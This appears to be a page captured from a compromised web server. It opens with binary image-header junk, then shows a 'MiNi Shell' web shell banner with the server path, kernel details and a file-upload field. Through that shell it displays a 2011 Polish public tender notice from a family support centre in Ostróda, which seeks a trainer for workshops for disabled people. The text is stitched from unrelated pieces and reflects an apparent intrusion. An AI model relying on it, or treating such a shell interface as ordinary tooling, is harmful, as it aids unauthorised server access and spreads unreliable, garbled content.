JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/119259-N-2011.html

<p class="kh_header"><b>Ostróda: Przedmiotem zamówienia jest zatrudnienie jednej osoby fizycznej, na umowę zlecenie do wykonywania czynności przeprowadzenia zajęć w ramach warsztatów aktywizujących oraz zajęć w ramach klubu samopomocowego (kod CPV - 80570000-0 Usługi szkolenia w dziedzinie rozwoju osobistego).</b><br>
<b>Numer ogłoszenia: 119259 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Ostródzie , ul. Mickiewicza 32, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 089 6460407, faks 089 6460405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.ostróda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zatrudnienie jednej osoby fizycznej, na umowę zlecenie do wykonywania czynności przeprowadzenia zajęć w ramach warsztatów aktywizujących oraz zajęć w ramach klubu samopomocowego (kod CPV - 80570000-0 Usługi szkolenia w dziedzinie rozwoju osobistego)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem zamówienia jest zatrudnienie jednej osoby fizycznej, na umowę zlecenie do wykonywania czynności przeprowadzenia zajęć w ramach warsztatów aktywizujących oraz zajęć w ramach klubu samopomocowego (kod CPV - 80570000-0 Usługi szkolenia w dziedzinie rozwoju osobistego).
Usługa realizowana będzie w ramach projektu pt. Powiatowe Centrum Pomocy Rodzinie w Ostródzie aktywnie integruje współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
W warsztacie aktywizującym i klubie samopomocowym będzie brało udział 28 osób niepełnosprawnych z Powiatu Ostródzkiego, w wieku aktywności zawodowej, pozostające bez zatrudnienia i korzystające z usług pomocy społecznej.
Szczegółowy zakres obowiązków i czynności, które musi wykonać trener w ramach przedmiotu zamówienia:
I.	Obowiązki i czynności związane z warsztatami aktywizującymi:
1.	Organizacja i przeprowadzenie dwóch warsztatów aktywizujących (każdy po 50 godzin dydaktycznych) dla dwóch, 14-osobowych grup osób niepełnosprawnych (Grupa A i Grupa B). 
2.	Celem warsztatu aktywizującego jest: zwiększenie świadomości Beneficjentów Ostatecznych na temat ich potrzeb i problemów oraz wzrost poziomu wiedzy w zakresie właściwego funkcjonowania w społeczeństwie.
3.	Usługa zostanie zrealizowana w dwóch grupach szkoleniowych, każda po 14 osób (Grupa A i Grupa B) podczas wyjazdowego turnusu rehabilitacyjnego.
4.	Jeden turnus rehabilitacyjny będzie trwał 14 dni kalendarzowych, przy czym warsztat aktywizujący realizowany będzie wyłącznie w dni robocze. Drugi turnus rozpocznie się bezpośrednio po zakończeniu pierwszego, łączny wymiar turnusów 27 kolejnych dni kalendarzowych. Planuje się rozpoczęcie turnusu na początku maja 2011 r.
5.	Czas trwania jednego warsztatu aktywizującego wynosi 50 godzin dydaktycznych: 10 dni roboczych po 5 godzin dydaktycznych dziennie.
6.	Łącznie zrealizowanych zostanie 100 godzin usługi.
7.	1 godzina dydaktyczna = 45 min. W czas trwania warsztatów nie wlicza się przerw.
8.	Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu zawarcia umowy.
9.	Wykonawca jest zobowiązany do stawienia się w pierwszym dniu wyjazdu na turnus rehabilitacyjny Grupy A w Ostródzie, w miejscu i godzinie wskazanej przez Zleceniodawcę.
10.	Wykonawca jest zobowiązany do przebywania na miejscu realizacji usługi do ostatniego dnia turnusu rehabilitacyjnego realizowanego dla grupy B i powrotu z turnusu do Ostródy wraz z grupą B.
11.	Zakres merytoryczny warsztatu aktywizującego powinien być dostosowany do potrzeb uczestników. 
12.	Minimalny zakres merytoryczny warsztatu aktywizującego obejmuje:
	Poznanie samego siebie;
	Umiejętności;
	Specyfika uczenia się osób dorosłych;
	Reakcja na zmianę własnej sytuacji społecznej (tematyka musi uwzględniać wszystkie aspekty życia społecznego);
	Bariery w drodze do poprawy sytuacji społecznej - budowanie motywacji do ich pokonywania;
	Twórcze rozwiązywanie problemów;
	Autoprezentacja;
	Komunikacja interpersonalna;
	Asertywność .
13.	Wykonawca jest zobowiązany do przygotowania konspektu warsztatu aktywizującego obejmującego powyższy zakres merytoryczny.
14.	Wykonawca jest zobowiązany do przygotowania materiałów szkoleniowych obejmujących powyższy zakres merytoryczny.
15.	Wykonawca jest zobowiązany do przeprowadzenia warsztatu aktywizującego zgodnie z harmonogramem przedstawionym Zamawiającemu najpóźniej w dniu zawarcia umowy. 
16.	Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas warsztatu aktywizującego.
17.	Zajęcia muszą odbyć się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
18.	Wykonawca jest zobowiązany do uczestnictwa we wszystkich formach wsparcia zaplanowanych dla uczestników turnusu rehabilitacyjnego, w tym wycieczkach, wieczorach integracyjnych, itp.
19.	Wykonawca jest zobowiązany do pełnienia roli opiekuna grupy podczas wyjazdu i wspierania osób niepełnosprawnych przez cały okres pobytu.
20.	Wykonawca jest zobowiązany do udokumentowania przeprowadzonego warsztatu aktywizującego w postaci: konspektu i harmonogramu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
21.	Wykonawca jest zobowiązany do przekazania Zamawiającemu oryginałów dokumentów wymienionych w punkcie 20 najpóźniej w dniu przedłożenia rachunku za wykonanie usługi.
II.	Obowiązki i czynności związane z zajęciami klubu samopomocowego:
1.	Organizacja i przeprowadzenie dwóch cyklów spotkań klubu samopomocowego (każdy po 12 h) dla dwóch, 14-osobowych grup osób niepełnosprawnych (Grupa A i Grupa B).
2.	W spotkaniach klubu samopomocowego wezmą udział osoby, które wróciły z turnusu rehabilitacyjnego.
3.	Celem klubu samopomocowego jest: zwiększenie świadomości Beneficjentów Ostatecznych na temat ich potrzeb i problemów oraz wzrost poziomu wiedzy w zakresie umiejętności społecznych i poruszania się w środowisku społecznym.
4.	Usługa zostanie zrealizowana w Ostródzie w dwóch grupach, każda po 14 osób (Grupa A i Grupa B). 
5.	Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu powrotu z turnusu rehabilitacyjnego grupy B.
6.	Spotkania klubu samopomocowego będą realizowane raz w miesiącu, rozpoczynając się, nie wcześniej niż w czerwcu i kończąc nie później niż w grudniu 2011 r.
7.	Spotkania klubu samopomocowego realizowane będą wyłącznie w dni robocze i rozpoczynały się będą nie wcześniej niż o godzinie 9.00, a kończyły się nie później niż o godzinie 16.00.
8.	Czas trwania jednego cyklu spotkań klubu samopomocowego wynosi 12 godzin dydaktycznych: 6 dni roboczych po 2 godziny dydaktyczne dziennie.
9.	Łącznie zrealizowane zostaną 24 godziny usługi.
10.	1 godzina dydaktyczna = 45 min. W czas trwania spotkań nie wlicza się przerw.
11.	Zakres merytoryczny spotkań klubu samopomocowego powinien być dostosowany do potrzeb uczestników i wynikać z ewaluacji przeprowadzonej na zakończenie warsztatu aktywizującego. 
12.	Wykonawca jest zobowiązany do przygotowania konspektu i harmonogramu spotkań klubu samopomocowego i przekazania go do akceptacji przez Zamawiającego. 
13.	Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas spotkań klubu samopomocowego.
14.	Zajęcia muszą odbyć się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
15.	Wykonawca jest zobowiązany do udokumentowania przeprowadzonych spotkań klubu samopomocowego w postaci: konspektu i harmonogramu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
16.	Wykonawca jest zobowiązany do przekazania oryginałów dokumentów wymienionych w punkcie 15 najpóźniej w dniu przedłożenia Zamawiającemu rachunku za wykonanie usługi.
Postępowanie nie jest prowadzone w częściach.
Odbiór wykonanej usługi przeprowadzony zostanie na podstawie dokumentacji złożonej przez Zamawiającego w formie oryginałów: dzienników zajęć, konspektów zajęć, list obecności, końcowego sprawozdania z wykonanej usługi oraz protokół końcowy z wykonania usługi.
Nie dopuszcza się składania ofert wariantowych. Zamówienie nie jest prowadzone w celu zawarcia umowy ramowej, ustanowienia dynamicznego systemu zakupów i nie jest prowadzone w ramach aukcji elektronicznej.
Zamawiający nie dopuszcza podwykonawstwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli osoba ubiegająca się o zamówienie przeprowadziła co najmniej dwa warsztaty grupowe, a każda grupa obejmowała min. 10 osób niepełnosprawnych, z zakresu aktywizacji społecznej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli Wykonawca posiada wykształcenie, co najmniej średnie i posiada przygotowanie do pracy z osobami niepełnosprawnymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Kadra dydaktyczna - 30</li>
<li>3 - Program i materiały szkoleniowe - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_ostrodzki/ oraz www.pcpr.ostróda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Ostródzie
14-100 Ostróda, ul. Mickiewicza 32
Fax 896460405.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Ostródzie
14-100 Ostróda, ul. Mickiewicza 32
pok. 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa realizowana będzie w ramach projektu pt. Powiatowe Centrum Pomocy Rodzinie w Ostródzie aktywnie integruje współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com